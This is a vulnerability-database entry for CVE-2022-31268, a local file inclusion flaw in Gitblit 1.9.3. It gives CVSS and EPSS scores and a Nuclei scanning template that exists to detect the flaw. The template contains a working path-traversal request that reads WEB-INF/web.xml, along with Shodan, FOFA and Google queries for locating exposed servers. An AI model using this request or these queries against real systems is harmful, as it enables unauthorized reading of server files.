Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-31268
HistoryJun 06, 2022 - 10:59 a.m.

Gitblit 1.9.3 - Local File Inclusion

2022-06-0610:59:31
ProjectDiscovery
github.com
44

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.008 Low

EPSS

Percentile

81.4%

Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
id: CVE-2022-31268

info:
  name: Gitblit 1.9.3 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.
  remediation: |
    Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268).
  reference:
    - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md
    - https://vuldb.com/?id.200500
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31268
    - https://github.com/Marcuccio/kevin
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31268
    cwe-id: CWE-22
    epss-score: 0.00618
    epss-percentile: 0.76574
    cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gitblit
    product: gitblit
    shodan-query:
      - http.html:"Gitblit"
      - http.title:"gitblit"
      - http.html:"gitblit"
    fofa-query:
      - title="gitblit"
      - body="gitblit"
    google-query: intitle:"gitblit"
  tags: cve,cve2022,lfi,gitblit

http:
  - method: GET
    path:
      - "{{BaseURL}}/resources//../WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "java.sun.com"
          - "gitblit.properties"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 200
# digest: 490a0046304402202ec302e9c8822217a998b91bb77bb034d8fb4988cfc328fe2e5b2e8626d6a084022008e6812a1171f4dd956bf8de1e8fd76237bc40323b6a9356f55887199358d9d9:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.008 Low

EPSS

Percentile

81.4%

Related for NUCLEI:CVE-2022-31268